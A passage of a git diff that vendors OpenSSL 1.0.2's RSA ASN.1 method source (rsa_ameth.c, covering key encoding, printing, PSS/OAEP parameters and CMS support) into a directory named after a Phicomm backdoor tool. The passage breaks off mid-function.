+# define RSA_R_UNKNOWN_ALGORITHM_TYPE                     117
+# define RSA_R_UNKNOWN_DIGEST                             163
+# define RSA_R_UNKNOWN_MASK_DIGEST                        151
+# define RSA_R_UNKNOWN_PADDING_TYPE                       118
+# define RSA_R_UNKNOWN_PSS_DIGEST                         152
+# define RSA_R_UNSUPPORTED_ENCRYPTION_TYPE                164
+# define RSA_R_UNSUPPORTED_LABEL_SOURCE                   165
+# define RSA_R_UNSUPPORTED_MASK_ALGORITHM                 153
+# define RSA_R_UNSUPPORTED_MASK_PARAMETER                 154
+# define RSA_R_UNSUPPORTED_SIGNATURE_TYPE                 155
+# define RSA_R_VALUE_MISSING                              147
+# define RSA_R_WRONG_SIGNATURE_LENGTH                     119
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.c
new file mode 100644
index 0000000..c7106a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.c
@@ -0,0 +1,958 @@
+/* crypto/rsa/rsa_ameth.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/rsa.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#include "asn1_locl.h"
+
+static int rsa_cms_sign(CMS_SignerInfo *si);
+static int rsa_cms_verify(CMS_SignerInfo *si);
+static int rsa_cms_decrypt(CMS_RecipientInfo *ri);
+static int rsa_cms_encrypt(CMS_RecipientInfo *ri);
+
+static int rsa_pub_encode(X509_PUBKEY *pk, const EVP_PKEY *pkey)
+{
+    unsigned char *penc = NULL;
+    int penclen;
+    penclen = i2d_RSAPublicKey(pkey->pkey.rsa, &penc);
+    if (penclen <= 0)
+        return 0;
+    if (X509_PUBKEY_set0_param(pk, OBJ_nid2obj(EVP_PKEY_RSA),
+                               V_ASN1_NULL, NULL, penc, penclen))
+        return 1;
+
+    OPENSSL_free(penc);
+    return 0;
+}
+
+static int rsa_pub_decode(EVP_PKEY *pkey, X509_PUBKEY *pubkey)
+{
+    const unsigned char *p;
+    int pklen;
+    RSA *rsa = NULL;
+    if (!X509_PUBKEY_get0_param(NULL, &p, &pklen, NULL, pubkey))
+        return 0;
+    if (!(rsa = d2i_RSAPublicKey(NULL, &p, pklen))) {
+        RSAerr(RSA_F_RSA_PUB_DECODE, ERR_R_RSA_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign_RSA(pkey, rsa);
+    return 1;
+}
+
+static int rsa_pub_cmp(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (BN_cmp(b->pkey.rsa->n, a->pkey.rsa->n) != 0
+        || BN_cmp(b->pkey.rsa->e, a->pkey.rsa->e) != 0)
+        return 0;
+    return 1;
+}
+
+static int old_rsa_priv_decode(EVP_PKEY *pkey,
+                               const unsigned char **pder, int derlen)
+{
+    RSA *rsa;
+    if (!(rsa = d2i_RSAPrivateKey(NULL, pder, derlen))) {
+        RSAerr(RSA_F_OLD_RSA_PRIV_DECODE, ERR_R_RSA_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign_RSA(pkey, rsa);
+    return 1;
+}
+
+static int old_rsa_priv_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_RSAPrivateKey(pkey->pkey.rsa, pder);
+}
+
+static int rsa_priv_encode(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pkey)
+{
+    unsigned char *rk = NULL;
+    int rklen;
+    rklen = i2d_RSAPrivateKey(pkey->pkey.rsa, &rk);
+
+    if (rklen <= 0) {
+        RSAerr(RSA_F_RSA_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    if (!PKCS8_pkey_set0(p8, OBJ_nid2obj(NID_rsaEncryption), 0,
+                         V_ASN1_NULL, NULL, rk, rklen)) {
+        RSAerr(RSA_F_RSA_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    return 1;
+}
+
+static int rsa_priv_decode(EVP_PKEY *pkey, PKCS8_PRIV_KEY_INFO *p8)
+{
+    const unsigned char *p;
+    int pklen;
+    if (!PKCS8_pkey_get0(NULL, &p, &pklen, NULL, p8))
+        return 0;
+    return old_rsa_priv_decode(pkey, &p, pklen);
+}
+
+static int int_rsa_size(const EVP_PKEY *pkey)
+{
+    return RSA_size(pkey->pkey.rsa);
+}
+
+static int rsa_bits(const EVP_PKEY *pkey)
+{
+    return BN_num_bits(pkey->pkey.rsa->n);
+}
+
+static void int_rsa_free(EVP_PKEY *pkey)
+{
+    RSA_free(pkey->pkey.rsa);
+}
+
+static void update_buflen(const BIGNUM *b, size_t *pbuflen)
+{
+    size_t i;
+    if (!b)
+        return;
+    if (*pbuflen < (i = (size_t)BN_num_bytes(b)))
+        *pbuflen = i;
+}
+
+static int do_rsa_print(BIO *bp, const RSA *x, int off, int priv)
+{
+    char *str;
+    const char *s;
+    unsigned char *m = NULL;
+    int ret = 0, mod_len = 0;
+    size_t buf_len = 0;
+
+    update_buflen(x->n, &buf_len);
+    update_buflen(x->e, &buf_len);
+
+    if (priv) {
+        update_buflen(x->d, &buf_len);
+        update_buflen(x->p, &buf_len);
+        update_buflen(x->q, &buf_len);
+        update_buflen(x->dmp1, &buf_len);
+        update_buflen(x->dmq1, &buf_len);
+        update_buflen(x->iqmp, &buf_len);
+    }
+
+    m = (unsigned char *)OPENSSL_malloc(buf_len + 10);
+    if (m == NULL) {
+        RSAerr(RSA_F_DO_RSA_PRINT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (x->n != NULL)
+        mod_len = BN_num_bits(x->n);
+
+    if (!BIO_indent(bp, off, 128))
+        goto err;
+
+    if (priv && x->d) {
+        if (BIO_printf(bp, "Private-Key: (%d bit)\n", mod_len)
+            <= 0)
+            goto err;
+        str = "modulus:";
+        s = "publicExponent:";
+    } else {
+        if (BIO_printf(bp, "Public-Key: (%d bit)\n", mod_len)
+            <= 0)
+            goto err;
+        str = "Modulus:";
+        s = "Exponent:";
+    }
+    if (!ASN1_bn_print(bp, str, x->n, m, off))
+        goto err;
+    if (!ASN1_bn_print(bp, s, x->e, m, off))
+        goto err;
+    if (priv) {
+        if (!ASN1_bn_print(bp, "privateExponent:", x->d, m, off))
+            goto err;
+        if (!ASN1_bn_print(bp, "prime1:", x->p, m, off))
+            goto err;
+        if (!ASN1_bn_print(bp, "prime2:", x->q, m, off))
+            goto err;
+        if (!ASN1_bn_print(bp, "exponent1:", x->dmp1, m, off))
+            goto err;
+        if (!ASN1_bn_print(bp, "exponent2:", x->dmq1, m, off))
+            goto err;
+        if (!ASN1_bn_print(bp, "coefficient:", x->iqmp, m, off))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if (m != NULL)
+        OPENSSL_free(m);
+    return (ret);
+}
+
+static int rsa_pub_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                         ASN1_PCTX *ctx)
+{
+    return do_rsa_print(bp, pkey->pkey.rsa, indent, 0);
+}
+
+static int rsa_priv_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                          ASN1_PCTX *ctx)
+{
+    return do_rsa_print(bp, pkey->pkey.rsa, indent, 1);
+}
+
+/* Given an MGF1 Algorithm ID decode to an Algorithm Identifier */
+static X509_ALGOR *rsa_mgf1_decode(X509_ALGOR *alg)
+{
+    const unsigned char *p;
+    int plen;
+    if (alg == NULL)
+        return NULL;
+    if (OBJ_obj2nid(alg->algorithm) != NID_mgf1)
+        return NULL;
+    if (alg->parameter->type != V_ASN1_SEQUENCE)
+        return NULL;
+
+    p = alg->parameter->value.sequence->data;
+    plen = alg->parameter->value.sequence->length;
+    return d2i_X509_ALGOR(NULL, &p, plen);
+}
+
+static RSA_PSS_PARAMS *rsa_pss_decode(const X509_ALGOR *alg,
+                                      X509_ALGOR **pmaskHash)
+{
+    const unsigned char *p;
+    int plen;
+    RSA_PSS_PARAMS *pss;
+
+    *pmaskHash = NULL;
+
+    if (!alg->parameter || alg->parameter->type != V_ASN1_SEQUENCE)
+        return NULL;
+    p = alg->parameter->value.sequence->data;
+    plen = alg->parameter->value.sequence->length;
+    pss = d2i_RSA_PSS_PARAMS(NULL, &p, plen);
+
+    if (!pss)
+        return NULL;
+
+    *pmaskHash = rsa_mgf1_decode(pss->maskGenAlgorithm);
+
+    return pss;
+}
+
+static int rsa_pss_param_print(BIO *bp, RSA_PSS_PARAMS *pss,
+                               X509_ALGOR *maskHash, int indent)
+{
+    int rv = 0;
+    if (!pss) {
+        if (BIO_puts(bp, " (INVALID PSS PARAMETERS)\n") <= 0)
+            return 0;
+        return 1;
+    }
+    if (BIO_puts(bp, "\n") <= 0)
+        goto err;
+    if (!BIO_indent(bp, indent, 128))
+        goto err;
+    if (BIO_puts(bp, "Hash Algorithm: ") <= 0)
+        goto err;
+
+    if (pss->hashAlgorithm) {
+        if (i2a_ASN1_OBJECT(bp, pss->hashAlgorithm->algorithm) <= 0)
+            goto err;
+    } else if (BIO_puts(bp, "sha1 (default)") <= 0)
+        goto err;
+
+    if (BIO_puts(bp, "\n") <= 0)
+        goto err;
+
+    if (!BIO_indent(bp, indent, 128))
+        goto err;
+
+    if (BIO_puts(bp, "Mask Algorithm: ") <= 0)
+        goto err;
+    if (pss->maskGenAlgorithm) {
+        if (i2a_ASN1_OBJECT(bp, pss->maskGenAlgorithm->algorithm) <= 0)
+            goto err;
+        if (BIO_puts(bp, " with ") <= 0)
+            goto err;
+        if (maskHash) {
+            if (i2a_ASN1_OBJECT(bp, maskHash->algorithm) <= 0)
+                goto err;
+        } else if (BIO_puts(bp, "INVALID") <= 0)
+            goto err;
+    } else if (BIO_puts(bp, "mgf1 with sha1 (default)") <= 0)
+        goto err;
+    BIO_puts(bp, "\n");
+
+    if (!BIO_indent(bp, indent, 128))
+        goto err;
+    if (BIO_puts(bp, "Salt Length: 0x") <= 0)
+        goto err;
+    if (pss->saltLength) {
+        if (i2a_ASN1_INTEGER(bp, pss->saltLength) <= 0)
+            goto err;
+    } else if (BIO_puts(bp, "14 (default)") <= 0)
+        goto err;
+    BIO_puts(bp, "\n");
+
+    if (!BIO_indent(bp, indent, 128))
+        goto err;
+    if (BIO_puts(bp, "Trailer Field: 0x") <= 0)
+        goto err;
+    if (pss->trailerField) {
+        if (i2a_ASN1_INTEGER(bp, pss->trailerField) <= 0)
+            goto err;
+    } else if (BIO_puts(bp, "BC (default)") <= 0)
+        goto err;
+    BIO_puts(bp, "\n");
+
+    rv = 1;
+
+ err:
+    return rv;
+
+}
+
+static int rsa_sig_print(BIO *bp, const X509_ALGOR *sigalg,
+                         const ASN1_STRING *sig, int indent, ASN1_PCTX *pctx)
+{
+    if (OBJ_obj2nid(sigalg->algorithm) == NID_rsassaPss) {
+        int rv;
+        RSA_PSS_PARAMS *pss;
+        X509_ALGOR *maskHash;
+        pss = rsa_pss_decode(sigalg, &maskHash);
+        rv = rsa_pss_param_print(bp, pss, maskHash, indent);
+        if (pss)
+            RSA_PSS_PARAMS_free(pss);
+        if (maskHash)
+            X509_ALGOR_free(maskHash);
+        if (!rv)
+            return 0;
+    } else if (!sig && BIO_puts(bp, "\n") <= 0)
+        return 0;
+    if (sig)
+        return X509_signature_dump(bp, sig, indent);
+    return 1;
+}
+
+static int rsa_pkey_ctrl(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    X509_ALGOR *alg = NULL;
+    switch (op) {
+
+    case ASN1_PKEY_CTRL_PKCS7_SIGN:
+        if (arg1 == 0)
+            PKCS7_SIGNER_INFO_get0_algs(arg2, NULL, NULL, &alg);
+        break;
+
+    case ASN1_PKEY_CTRL_PKCS7_ENCRYPT:
+        if (arg1 == 0)
+            PKCS7_RECIP_INFO_get0_alg(arg2, &alg);
+        break;
+#ifndef OPENSSL_NO_CMS
+    case ASN1_PKEY_CTRL_CMS_SIGN:
+        if (arg1 == 0)
+            return rsa_cms_sign(arg2);
+        else if (arg1 == 1)
+            return rsa_cms_verify(arg2);
+        break;
+
+    case ASN1_PKEY_CTRL_CMS_ENVELOPE:
+        if (arg1 == 0)
+            return rsa_cms_encrypt(arg2);
+        else if (arg1 == 1)
+            return rsa_cms_decrypt(arg2);
+        break;
+
+    case ASN1_PKEY_CTRL_CMS_RI_TYPE:
+        *(int *)arg2 = CMS_RECIPINFO_TRANS;
+        return 1;
+#endif
+
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_sha256;
+        return 1;
+
+    default:
+        return -2;
+
+    }
+
+    if (alg)
+        X509_ALGOR_set0(alg, OBJ_nid2obj(NID_rsaEncryption), V_ASN1_NULL, 0);
+
+    return 1;
+
+}
+
+/* allocate and set algorithm ID from EVP_MD, default SHA1 */
+static int rsa_md_to_algor(X509_ALGOR **palg, const EVP_MD *md)
+{
+    if (EVP_MD_type(md) == NID_sha1)
+        return 1;
+    *palg = X509_ALGOR_new();
+    if (!*palg)
+        return 0;
+    X509_ALGOR_set_md(*palg, md);
+    return 1;
+}
+
+/* Allocate and set MGF1 algorithm ID from EVP_MD */
+static int rsa_md_to_mgf1(X509_ALGOR **palg, const EVP_MD *mgf1md)
+{
+    X509_ALGOR *algtmp = NULL;
+    ASN1_STRING *stmp = NULL;
+    *palg = NULL;
+    if (EVP_MD_type(mgf1md) == NID_sha1)
+        return 1;
+    /* need to embed algorithm ID inside another */
+    if (!rsa_md_to_algor(&algtmp, mgf1md))
+        goto err;
+    if (!ASN1_item_pack(algtmp, ASN1_ITEM_rptr(X509_ALGOR), &stmp))
+         goto err;
+    *palg = X509_ALGOR_new();
+    if (!*palg)
+        goto err;
+    X509_ALGOR_set0(*palg, OBJ_nid2obj(NID_mgf1), V_ASN1_SEQUENCE, stmp);
+    stmp = NULL;
+ err:
+    if (stmp)
+        ASN1_STRING_free(stmp);
+    if (algtmp)
+        X509_ALGOR_free(algtmp);
+    if (*palg)
+        return 1;
+    return 0;
+}
+
+/* convert algorithm ID to EVP_MD, default SHA1 */
+static const EVP_MD *rsa_algor_to_md(X509_ALGOR *alg)
+{
+    const EVP_MD *md;
+    if (!alg)
+        return EVP_sha1();
+    md = EVP_get_digestbyobj(alg->algorithm);
+    if (md == NULL)
+        RSAerr(RSA_F_RSA_ALGOR_TO_MD, RSA_R_UNKNOWN_DIGEST);
+    return md;
+}
+
+/* convert MGF1 algorithm ID to EVP_MD, default SHA1 */
+static const EVP_MD *rsa_mgf1_to_md(X509_ALGOR *alg, X509_ALGOR *maskHash)
+{
+    const EVP_MD *md;
+    if (!alg)
+        return EVP_sha1();
+    /* Check mask and lookup mask hash algorithm */
+    if (OBJ_obj2nid(alg->algorithm) != NID_mgf1) {
+        RSAerr(RSA_F_RSA_MGF1_TO_MD, RSA_R_UNSUPPORTED_MASK_ALGORITHM);
+        return NULL;
+    }
+    if (!maskHash) {
+        RSAerr(RSA_F_RSA_MGF1_TO_MD, RSA_R_UNSUPPORTED_MASK_PARAMETER);
+        return NULL;
+    }
+    md = EVP_get_digestbyobj(maskHash->algorithm);
+    if (md == NULL) {
+        RSAerr(RSA_F_RSA_MGF1_TO_MD, RSA_R_UNKNOWN_MASK_DIGEST);
+        return NULL;
+    }
+    return md;
+}
+
+/*
+ * Convert EVP_PKEY_CTX is PSS mode into corresponding algorithm parameter,
+ * suitable for setting an AlgorithmIdentifier.
+ */
+
+static ASN1_STRING *rsa_ctx_to_pss(EVP_PKEY_CTX *pkctx)
+{
+    const EVP_MD *sigmd, *mgf1md;
+    RSA_PSS_PARAMS *pss = NULL;
+    ASN1_STRING *os = NULL;
+    EVP_PKEY *pk = EVP_PKEY_CTX_get0_pkey(pkctx);
+    int saltlen, rv = 0;
+    if (EVP_PKEY_CTX_get_signature_md(pkctx, &sigmd) <= 0)
+        goto err;
+    if (EVP_PKEY_CTX_get_rsa_mgf1_md(pkctx, &mgf1md) <= 0)
+        goto err;
+    if (!EVP_PKEY_CTX_get_rsa_pss_saltlen(pkctx, &saltlen))
+        goto err;
+    if (saltlen == -1)
+        saltlen = EVP_MD_size(sigmd);
+    else if (saltlen == -2) {
+        saltlen = EVP_PKEY_size(pk) - EVP_MD_size(sigmd) - 2;
+        if (((EVP_PKEY_bits(pk) - 1) & 0x7) == 0)
+            saltlen--;
+    }
+    pss = RSA_PSS_PARAMS_new();
+    if (!pss)
+        goto err;
+    if (saltlen != 20) {
+        pss->saltLength = ASN1_INTEGER_new();
+        if (!pss->saltLength)
+            goto err;
+        if (!ASN1_INTEGER_set(pss->saltLength, saltlen))
+            goto err;
+    }
+    if (!rsa_md_to_algor(&pss->hashAlgorithm, sigmd))
+        goto err;
+    if (!rsa_md_to_mgf1(&pss->maskGenAlgorithm, mgf1md))
+        goto err;
+    /* Finally create string with pss parameter encoding. */
+    if (!ASN1_item_pack(pss, ASN1_ITEM_rptr(RSA_PSS_PARAMS), &os))
+         goto err;
+    rv = 1;
+ err:
+    if (pss)
+        RSA_PSS_PARAMS_free(pss);
+    if (rv)
+        return os;
+    if (os)
+        ASN1_STRING_free(os);
+    return NULL;
+}
+
+/*
+ * From PSS AlgorithmIdentifier set public key parameters. If pkey isn't NULL
+ * then the EVP_MD_CTX is setup and initalised. If it is NULL parameters are
+ * passed to pkctx instead.
+ */
+
+static int rsa_pss_to_ctx(EVP_MD_CTX *ctx, EVP_PKEY_CTX *pkctx,
+                          X509_ALGOR *sigalg, EVP_PKEY *pkey)
+{
+    int rv = -1;
+    int saltlen;
+    const EVP_MD *mgf1md = NULL, *md = NULL;
+    RSA_PSS_PARAMS *pss;
+    X509_ALGOR *maskHash;
+    /* Sanity check: make sure it is PSS */
+    if (OBJ_obj2nid(sigalg->algorithm) != NID_rsassaPss) {
+        RSAerr(RSA_F_RSA_PSS_TO_CTX, RSA_R_UNSUPPORTED_SIGNATURE_TYPE);
+        return -1;
+    }
+    /* Decode PSS parameters */
+    pss = rsa_pss_decode(sigalg, &maskHash);
+
+    if (pss == NULL) {
+        RSAerr(RSA_F_RSA_PSS_TO_CTX, RSA_R_INVALID_PSS_PARAMETERS);
+        goto err;
+    }
+    mgf1md = rsa_mgf1_to_md(pss->maskGenAlgorithm, maskHash);
+    if (!mgf1md)
+        goto err;
+    md = rsa_algor_to_md(pss->hashAlgorithm);
+    if (!md)
+        goto err;
+
+    if (pss->saltLength) {
+        saltlen = ASN1_INTEGER_get(pss->saltLength);
+
+        /*
+         * Could perform more salt length sanity checks but the main RSA
+         * routines will trap other invalid values anyway.
+         */
+        if (saltlen < 0) {
+            RSAerr(RSA_F_RSA_PSS_TO_CTX, RSA_R_INVALID_SALT_LENGTH);
+            goto err;
+        }
+    } else
+        saltlen = 20;
+
+    /*
+     * low-level routines support only trailer field 0xbc (value 1) and
+     * PKCS#1 says we should reject any other value anyway.
+     */
+    if (pss->trailerField && ASN1_INTEGER_get(pss->trailerField) != 1) {
+        RSAerr(RSA_F_RSA_PSS_TO_CTX, RSA_R_INVALID_TRAILER);
+        goto err;
+    }
+
+    /* We have all parameters now set up context */
+
+    if (pkey) {
+        if (!EVP_DigestVerifyInit(ctx, &pkctx, md, NULL, pkey))
+            goto err;
+    } else {
+        const EVP_MD *checkmd;
+        if (EVP_PKEY_CTX_get_signature_md(pkctx, &checkmd) <= 0)
+            goto err;
+        if (EVP_MD_type(md) != EVP_MD_type(checkmd)) {
+            RSAerr(RSA_F_RSA_PSS_TO_CTX, RSA_R_DIGEST_DOES_NOT_MATCH);
+            goto err;
+        }
+    }
+
+    if (EVP_PKEY_CTX_set_rsa_padding(pkctx, RSA_PKCS1_PSS_PADDING) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_set_rsa_pss_saltlen(pkctx, saltlen) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_set_rsa_mgf1_md(pkctx, mgf1md) <= 0)
+        goto err;
+    /* Carry on */
+    rv = 1;
+
+ err:
+    RSA_PSS_PARAMS_free(pss);
+    if (maskHash)
+        X509_ALGOR_free(maskHash);
+    return rv;
+}
+
+static int rsa_cms_verify(CMS_SignerInfo *si)
+{
+    int nid, nid2;
+    X509_ALGOR *alg;
+    EVP_PKEY_CTX *pkctx = CMS_SignerInfo_get0_pkey_ctx(si);
+    CMS_SignerInfo_get0_algs(si, NULL, NULL, NULL, &alg);
+    nid = OBJ_obj2nid(alg->algorithm);
+    if (nid == NID_rsaEncryption)
+        return 1;
+    if (nid == NID_rsassaPss)
+        return rsa_pss_to_ctx(NULL, pkctx, alg, NULL);
+    /* Workaround for some implementation that use a signature OID */
+    if (OBJ_find_sigid_algs(nid, NULL, &nid2)) {
+        if (nid2 == NID_rsaEncryption)
+            return 1;
+    }
+    return 0;
+}
+
+/*
+ * Customised RSA item verification routine. This is called when a signature
+ * is encountered requiring special handling. We currently only handle PSS.
+ */
+
+static int rsa_item_verify(EVP_MD_CTX *ctx, const ASN1_ITEM *it, void *asn,
+                           X509_ALGOR *sigalg, ASN1_BIT_STRING *sig,
+                           EVP_PKEY *pkey)
+{
+    /* Sanity check: make sure it is PSS */
+    if (OBJ_obj2nid(sigalg->algorithm) != NID_rsassaPss) {
+        RSAerr(RSA_F_RSA_ITEM_VERIFY, RSA_R_UNSUPPORTED_SIGNATURE_TYPE);
+        return -1;
+    }
+    if (rsa_pss_to_ctx(ctx, NULL, sigalg, pkey))
+        /* Carry on */
+        return 2;
+    return -1;
+}
+
+static int rsa_cms_sign(CMS_SignerInfo *si)
+{
+    int pad_mode = RSA_PKCS1_PADDING;
+    X509_ALGOR *alg;
+    EVP_PKEY_CTX *pkctx = CMS_SignerInfo_get0_pkey_ctx(si);
+    ASN1_STRING *os = NULL;
+    CMS_SignerInfo_get0_algs(si, NULL, NULL, NULL, &alg);
+    if (pkctx) {
+        if (EVP_PKEY_CTX_get_rsa_padding(pkctx, &pad_mode) <= 0)
+            return 0;
+    }
+    if (pad_mode == RSA_PKCS1_PADDING) {
+        X509_ALGOR_set0(alg, OBJ_nid2obj(NID_rsaEncryption), V_ASN1_NULL, 0);
+        return 1;
+    }
+    /* We don't support it */
+    if (pad_mode != RSA_PKCS1_PSS_PADDING)
+        return 0;
+    os = rsa_ctx_to_pss(pkctx);
+    if (!os)
+        return 0;
+    X509_ALGOR_set0(alg, OBJ_nid2obj(NID_rsassaPss), V_ASN1_SEQUENCE, os);
+    return 1;
+}
+
+static int rsa_item_sign(EVP_MD_CTX *ctx, const ASN1_ITEM *it, void *asn,
+                         X509_ALGOR *alg1, X509_ALGOR *alg2,
+                         ASN1_BIT_STRING *sig)
+{
+    int pad_mode;
+    EVP_PKEY_CTX *pkctx = ctx->pctx;
+    if (EVP_PKEY_CTX_get_rsa_padding(pkctx, &pad_mode) <= 0)
+        return 0;
+    if (pad_mode == RSA_PKCS1_PADDING)
+        return 2;
+    if (pad_mode == RSA_PKCS1_PSS_PADDING) {
+        ASN1_STRING *os1 = NULL;
+        os1 = rsa_ctx_to_pss(pkctx);
+        if (!os1)
+            return 0;
+        /* Duplicate parameters if we have to */
+        if (alg2) {
+            ASN1_STRING *os2 = ASN1_STRING_dup(os1);
+            if (!os2) {
+                ASN1_STRING_free(os1);
+                return 0;
+            }
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(NID_rsassaPss),
+                            V_ASN1_SEQUENCE, os2);
+        }
+        X509_ALGOR_set0(alg1, OBJ_nid2obj(NID_rsassaPss),
+                        V_ASN1_SEQUENCE, os1);
+        return 3;
+    }
+    return 2;
+}
+
+static RSA_OAEP_PARAMS *rsa_oaep_decode(const X509_ALGOR *alg,
+                                        X509_ALGOR **pmaskHash)
+{
+    const unsigned char *p;
+    int plen;
+    RSA_OAEP_PARAMS *pss;
+
+    *pmaskHash = NULL;
+
+    if (!alg->parameter || alg->parameter->type != V_ASN1_SEQUENCE)
+        return NULL;
+    p = alg->parameter->value.sequence->data;
+    plen = alg->parameter->value.sequence->length;
+    pss = d2i_RSA_OAEP_PARAMS(NULL, &p, plen);
+
+    if (!pss)
+        return NULL;
+
+    *pmaskHash = rsa_mgf1_decode(pss->maskGenFunc);
+
+    return pss;
+}
+
+static int rsa_cms_decrypt(CMS_RecipientInfo *ri)
+{
+    EVP_PKEY_CTX *pkctx;
+    X509_ALGOR *cmsalg;
+    int nid;
+    int rv = -1;
+    unsigned char *label = NULL;
+    int labellen = 0;
+    const EVP_MD *mgf1md = NULL, *md = NULL;
+    RSA_OAEP_PARAMS *oaep;
+    X509_ALGOR *maskHash;
+    pkctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    if (!pkctx)
+        return 0;
+    if (!CMS_RecipientInfo_ktri_get0_algs(ri, NULL, NULL, &cmsalg))
+        return -1;
+    nid = OBJ_obj2nid(cmsalg->algorithm);
+    if (nid == NID_rsaEncryption)
+        return 1;
+    if (nid != NID_rsaesOaep) {
+        RSAerr(RSA_F_RSA_CMS_DECRYPT, RSA_R_UNSUPPORTED_ENCRYPTION_TYPE);
+        return -1;
+    }
+    /* Decode OAEP parameters */
+    oaep = rsa_oaep_decode(cmsalg, &maskHash);
+
+    if (oaep == NULL) {
+        RSAerr(RSA_F_RSA_CMS_DECRYPT, RSA_R_INVALID_OAEP_PARAMETERS);
+        goto err;
+    }
+
+    mgf1md = rsa_mgf1_to_md(oaep->maskGenFunc, maskHash);
+    if (!mgf1md)
+        goto err;
+    md = rsa_algor_to_md(oaep->hashFunc);
+    if (!md)
+        goto err;
+
+    if (oaep->pSourceFunc) {
+        X509_ALGOR *plab = oaep->pSourceFunc;
+        if (OBJ_obj2nid(plab->algorithm) != NID_pSpecified) {
+            RSAerr(RSA_F_RSA_CMS_DECRYPT, RSA_R_UNSUPPORTED_LABEL_SOURCE);
+            goto err;
+        }
+        if (plab->parameter->type != V_ASN1_OCTET_STRING) {
+            RSAerr(RSA_F_RSA_CMS_DECRYPT, RSA_R_INVALID_LABEL);
+            goto err;
+        }
+
+        label = plab->parameter->value.octet_string->data;
+        /* Stop label being freed when OAEP parameters are freed */
+        plab->parameter->value.octet_string->data = NULL;
+        labellen = plab->parameter->value.octet_string->length;
+    }
+
+    if (EVP_PKEY_CTX_set_rsa_padding(pkctx, RSA_PKCS1_OAEP_PADDING) <= 0)
+        goto err;
+    if (EVP_PKEY_CTX_set_rsa_oaep_md(pkctx, md) <= 0)
+        goto err;
+    if (EVP_PKEY_CTX_set_rsa_mgf1_md(pkctx, mgf1md) <= 0)
+        goto err;
+    if (EVP_PKEY_CTX_set0_rsa_oaep_label(pkctx, label, labellen) <= 0)
+        goto err;
+    /* Carry on */
+    rv = 1;
+
+ err:
+    RSA_OAEP_PARAMS_free(oaep);
+    if (maskHash)
+        X509_ALGOR_free(maskHash);
+    return rv;
+}
+
+static int rsa_cms_encrypt(CMS_RecipientInfo *ri)
+{
+    const EVP_MD *md, *mgf1md;
+    RSA_OAEP_PARAMS *oaep = NULL;
+    ASN1_STRING *os = NULL;
+    X509_ALGOR *alg;
